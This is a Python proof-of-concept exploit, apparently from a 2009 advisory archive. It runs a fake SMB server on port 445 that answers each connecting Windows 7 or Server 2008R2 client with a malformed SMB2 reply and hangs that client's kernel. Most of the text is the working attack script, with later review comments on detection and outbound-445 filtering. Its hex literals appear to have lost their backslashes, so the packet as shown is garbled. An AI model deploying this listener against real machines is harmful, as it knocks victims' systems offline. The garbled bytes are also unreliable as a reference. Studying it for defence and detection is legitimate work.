# Title : Windows 7 / Server 2008R2 Remote Kernel Crash
# Published : 2009-11-11
# Author : Laurent Gaffie
#!/usr/bin/python
# win7-crash.py:
# Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
# Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an
# infinite loop.
# The machine that hangs is the SMB client that connects to this listener, not the host running it.
# NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast; from the target: \this_script_ip_addrBLAH , instantly crash
#Author: Laurent Gaffie
import SocketServer
# Canned reply that the request handler sends to every client that connects.
# The first literal is the length header. Per the author's note it declares 9a
# where 9e would match the data that follows; that mismatch is presumably what
# the affected client mishandles (the page reports an infinite loop).
# NOTE(review): for detection, the equivalent wire-level signal is an SMB reply
# whose declared length disagrees with the bytes actually carried.
# NOTE(review): the literals are kept character for character as the page
# shows them.
packet = "".join((
    "x00x00x00x9a",  # ---> length should be 9e not 9a..
    "xfex53x4dx42x40x00x00x00x00x00x00x00x00x00x01x00",
    "x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00",
    "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00",
    "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00",
    "x41x00x01x00x02x02x00x00x30x82xa4x11xe3x12x23x41",
    "xaax4bxadx99xfdx52x31x8dx01x00x00x00x00x00x01x00",
    "x00x00x01x00x00x00x01x00xcfx73x67x74x62x60xcax01",
    "xcbx51xe0x19x62x60xcax01x80x00x1ex00x20x4cx4dx20",
    "x60x1cx06x06x2bx06x01x05x05x02xa0x12x30x10xa0x0e",
    "x30x0cx06x0ax2bx06x01x04x01x82x37x02x02x0a",
))
class SMB2(SocketServer.BaseRequestHandler):
    """Connection handler that answers every client with the canned ``packet``.

    One instance is created per accepted TCP connection. The handler does
    not parse or validate anything the client sends; the reply is the same
    fixed message regardless of the request.
    """

    def handle(self):
        """Serve a single connection and then close it.

        Prints the peer address and a banner line, reads up to 1024 bytes
        from the client and discards them, sends the module-level ``packet``
        and closes the socket.
        """
        conn = self.request
        # The peer address is the only record kept of who connected.
        print("Who: %s" % (self.client_address,))
        print("THANKS SDL")
        # The request is read only so the reply follows a client message;
        # its contents are never inspected.
        client_request = conn.recv(1024)
        conn.send(packet)
        conn.close()
# Listen on every local interface, TCP port 445, and hand each accepted
# connection to the SMB2 handler. serve_forever() blocks until the process is
# stopped.
# NOTE(review): the exposure is client-side. A host is affected only when it
# opens an SMB connection to a listener like this one, so filtering outbound
# TCP 445 to untrusted networks and applying the vendor fix are the relevant
# mitigations.
bind_address = ('', 445)
launch = SocketServer.TCPServer(bind_address, SMB2)
launch.serve_forever()